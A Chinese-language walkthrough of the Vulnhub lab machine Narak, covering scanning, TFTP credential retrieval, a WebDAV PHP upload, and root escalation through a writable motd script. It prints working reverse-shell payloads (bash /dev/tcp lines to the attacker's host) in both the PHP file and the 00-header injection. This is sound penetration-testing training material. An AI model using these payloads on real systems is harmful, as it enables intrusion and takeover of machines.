Narak靶机笔记
概述
Narak是一台Vulnhub的靶机,其中有简单的tftp和webdav的利用,以及motd文件的一些知识
靶机地址: https://pan.baidu.com/s/1PbPrGJQHxsvGYrAN1k1New?pwd=a7kv
提取码: a7kv
当然你也可以去Vulnhub官网下载
一、nmap扫描
1)主机发现
bash
sudo nmap -sn 192.168.84.0/24
Nmap scan report for 192.168.84.130
Host is up (0.00026s latency).
MAC Address: 00:0C:29:38:2B:28 (VMware)
看到192.168.84.130
是靶机ip
2)端口扫描
a) TCP端口
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.84.130
Nmap scan report for 192.168.84.130
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:38:2B:28 (VMware)
# Nmap done at Fri Sep 20 11:59:44 2024 -- 1 IP address (1 host up) scanned in 1.91 seconds
b) UDP端口
sudo nmap -sU --top-ports 20 -o udp 192.168.84.130
Nmap scan report for 192.168.84.130
Host is up (0.00066s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:38:2B:28 (VMware)
# Nmap done at Fri Sep 20 12:01:21 2024 -- 1 IP address (1 host up) scanned in 7.99 seconds
看到69号tftp可能是开放的,一会可以看看有没有什么可以传输的文件
3)详细信息扫描
sudo nmap -sT -sV -sC -O -p22,80 -o details 192.168.84.130
Nmap scan report for 192.168.84.130
Host is up (0.00077s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71bd592d221eb36b4f06bf83e1cc9243 (RSA)
| 256 f8ec45847f2933b28dfc7d07289331b0 (ECDSA)
|_ 256 d09436960480331040683221cbae68f9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: NARAK
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:38:2B:28 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 12:00:51 2024 -- 1 IP address (1 host up) scanned in 8.02 seconds
二、web渗透
打开 80端口
没有什么有价值的信息,我们进行目录爆破
1)目录爆破
sudo gobuster dir -u http://192.168.84.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,rar,txt,sql
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.84.130
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,sql,zip,rar
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.84.130/images/]
/tips.txt (Status: 200) [Size: 58]
/webdav (Status: 401) [Size: 461]
/server-status (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
看到几个目录和文件被扫描了出来,我们全部打开看看
在tips.txt中,他说打开narak的提示可以在creds.txt中找到。但是我们现在并不知道creds.txt在哪里
接着看webdav
他需要认证,我们并没有有效地凭证信息
三、tftp渗透
在udp扫描中,我们看到了tftp端口可能是开放的,而我们在tips.txt文件中看到了一个存在creds.txt文件的信息
尝试一下
tftp 192.168.84.130
tftp是一种简单的文件传输协议,比较小巧,搭建也很方便。他不能列出系统文件,只能进行一些简单的文件操作
get creds.txt
cat creds.txt
eWFtZG9vdDpTd2FyZw==
看到是类似于base64加密,解秘看看
cat creds.txt | base64 -d
yamdoot:Swarg
发现了一组凭据yamdoot:Swarg
四、获得立足点
拿到凭据肯定要尝试ssh登陆
看到这并不是ssh的凭证,那会不会是webdav的呢?
尝试登陆webdav
成功登陆
用davtest测试以这个webdav服务
davtest -url http://192.168.84.130/webdav -auth yamdoot:Swarg
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.84.130/webdav
********************************************************
NOTE Random string for this session: _8C8yvKn
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.84.130/webdav/DavTestDir__8C8yvKn
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.txt
EXEC txt FAIL
EXEC jsp FAIL
EXEC html SUCCEED: http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.html
EXEC html FAIL
EXEC asp FAIL
EXEC jhtml FAIL
EXEC aspx FAIL
EXEC pl FAIL
EXEC cfm FAIL
EXEC cgi FAIL
EXEC shtml FAIL
EXEC php SUCCEED: http://192.168.84.130/webdav/DavTestDir__8C8yvKn/davtest__8C8yvKn.php
EXEC php FAIL
********************************************************
看到是可以解析php文件的,构造php_reverse.php
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.84.128/4444 0>&1'"); ?>
cadaver,这是webdav服务的客户端
看到上传成功
kali本地监听,并在浏览器访问php_rev.php
成功获得立足点
五、提权到root
通过查看可写文件,找到了一些令我们感兴趣的
find / -writable -type f -not -path '/proc/*' -not -path '/sys/*' 2> /dev/null
看到sh文件和motd文件
motd
(Message of the Day)文件用于在用户登录 Linux 系统时显示欢迎信息或通知。它通常用于向用户提供系统信息、公告、或其他登录时需要注意的事项。
cat hell.sh
#!/bin/bash
echo"Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
看到了一串beef字符串,复制到hell文件中,解密
看到了明文信息,去碰撞一下ssh
一共有三个用户,把用户放到users文件,chitragupt放到pass文件
用ssh登陆进去
直接去motd文件下吧
这里可以在00-header文件中添加我们的提权逻辑
echo -e "bash -c \"bash -i >& /dev/tcp/192.168.84.128/8888 0>&1\"" >> 00-header
在kali中监听8888端口,并重新ssh登陆inferno用户
看到#提示符,提权到了root权限
总结
- 通过nmap扫描,我们发现22,80的TCP端口是开放的,udp的69端口tftp服务可能是开启的
- 进行目录爆破发现目标机器有webdav服务,并且知道了目标有creds.txt文件。
- 利用tftp协议拿到了creds.txt,里面记录了webdav的凭证信息,成功登陆webdav
- 利用cadaver这个webdav客户端,上传php反弹shell,成功获得了立足点。
- 翻找系统可写文件,发现了一个sh和motd文件,查看sh文件猜测是一个用户的ssh凭证,用hydra成功爆破出ssh的凭证
- 用motd的00-hearder文件的逻辑完成了提权操作